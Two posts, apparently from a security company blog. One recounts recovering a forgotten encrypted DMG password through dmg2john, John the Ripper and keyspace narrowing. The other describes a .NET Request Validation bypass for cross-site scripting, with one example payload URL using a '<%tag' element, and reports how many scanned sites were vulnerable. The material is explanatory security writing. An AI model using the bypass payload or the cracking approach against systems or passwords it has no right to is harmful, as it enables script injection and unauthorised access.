Next step, send the dmg2john output of my DMG over to Jeremi at Stricture along with everything I think I remember about what my password might have been. Jeremi informs me of the next challenge, he’s only able to crack my DMG at a speed of ~100 c/s! At that rate it’s going to take a little over a decade worth of cracking to exhaust the password key space. I’m thinking this is very odd, it’s only maybe 6 extra characters tops. Jeremi explains why…

The reason it’s so slow is because your AES256-encrypted DMG uses 250,000 rounds of PBKDF2-HMAC-SHA-1 to generate the encryption key. The ludicrous round count makes it extremely computationally expensive, slowing down the HMAC-SHA1 process by a factor of 250,000.

My Xeon X7350 can crack a single round of HMAC-SHA1 at a rate of 9.3 million hashes per second. But since we are using 250,000 rounds, it means I was reduced to doing ~ 37 hashes per second. Using all four processors I was only able to pull about 104 hashes per second total (doesn’t scale perfectly.)

Once understanding this, Jeremi begins asking for more information about what the extra six or so characters in my password might have been. We’re they all upper and lower case characters? What about digits? Any special characters? Which characters were most likely used, or not used? Ever bit of intel helped a lot. We managed to whittle down an in initial 41106759720 possible password combinations to 22472. This meant the total amount of time required to crack the DMG was reduced to 3.5 minutes on his rig.

Subsequently, Jeremi sent me what had to be one the most relieving and frightening emails I’ve ever received in my life. Relieving because I recognized the password immediately upon sight. I knew it was right, but my anxiety level remained at 10 until typing it in and seeing it work. I hadn’t touched my precious data in weeks! It was a tender moment, but also frightening because, well, no security professional is ever comfortable seeing such a prized password emailed to them from someone else. When/if that happens, it typically means you are hacked and another pain awaits.

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity.  I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Now, after telling everyone a few of my best tricks and enduring an awful deficiency in one of them, I’ll obviously have to change things up a bit. Clearly I need paper backup, and thinking maybe about giving it to my attorney for safekeeping where it’ll enjoy legal privilege protection. We’ll see.

In the meantime, I can’t thank the John the Ripper guys and Jeremi from Stricture Consulting enough. If you need a password cracked, for personal and professional reasons, this is where you look to.

 

 

By the Website Vulnerability Numbers: .Net XSS Request Validation Bypass

There are a million variations of Cross-Site Scripting (XSS), some more interesting than others. Back in August 2012 a post entitled, “.Net Cross Site Scripting – Request Validation Bypassing,” from Quotium caught our eye. The filter-bypass technique they described looked extremely trivial, only a single % character was necessary, but it worked all the same.

“This is caused by the fact that although ‹tag› is restricted by the Request Validation filter, ‹%tag› is not restricted but parsed by Internet Explorer browsers as a valid tag.

http://www.vulnerablesite.com/login.aspx?param=‹%tag style=”xss:expression(alert(123))” ›

The other notable point was that for some reason, which may be entirely reasonable, Microsoft opted to NOT address the issue. .Net developers are advised that they must provide adequate defense on their own.

At WhiteHat Security, a big part of our job is helping them do exactly that. Our research team added checks to WhiteHat Sentinel to identify this XSS variant. In the months since, we scanned 10,000+ websites and waited to see if anything turned up. So far, we’ve identified exactly 20 websites that are vulnerable to this specific issue. Not a huge number in terms of percentage of websites, but there it is.